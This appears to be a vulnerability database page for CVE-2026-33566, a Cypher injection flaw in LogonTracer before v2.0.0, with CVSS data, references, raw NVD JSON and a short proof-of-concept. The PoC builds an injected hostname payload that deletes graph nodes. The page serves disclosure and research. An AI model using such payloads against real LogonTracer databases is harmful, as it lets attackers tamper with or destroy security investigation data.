CVE-2026-33566

Description

There is a cypher injection issue in LogonTracer prior to v2.0.0. If specially crafted Windows event log data is loaded, the contents of the database may be altered.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:jpcert:logontracer:*:*:*:*:*:*:*:* - VULNERABLE

LogonTracer < 2.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC Concept for CVE-2026-33566
# This demonstrates how a malicious username in a log could trigger injection.

# Malicious payload intended to be injected into a Cypher query
# Context: LogonTracer constructs a query like: 
# MERGE (n:Computer {name: '$HOSTNAME'})

# If $HOSTNAME is controlled by the attacker:
malicious_hostname = "victim_pc') DELETE n RETURN n //"

# The resulting query becomes:
# MERGE (n:Computer {name: 'victim_pc') DELETE n RETURN n //'})
# This would delete the node or execute arbitrary commands.

print(f"Generated malicious hostname payload: {malicious_hostname}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33566
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33566
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33566/
[4] VulDB https://vuldb.com/cve/CVE-2026-33566
[5] https://jvn.jp/en/jp/JVN57877356/
[6] https://www.jpcert.or.jp/press/2026/PR20260423.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33566", "sourceIdentifier": "[email protected]", "published": "2026-04-27T00:16:20.083", "lastModified": "2026-04-28T18:15:39.440", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is a cypher injection issue in LogonTracer prior to v2.0.0. If specially crafted Windows event log data is loaded, the contents of the database may be altered."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-943"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jpcert:logontracer:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.0.0", "matchCriteriaId": "3F702F84-44F3-411B-8F03-87CE72BB6510"}]}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN57877356/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.jpcert.or.jp/press/2026/PR20260423.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}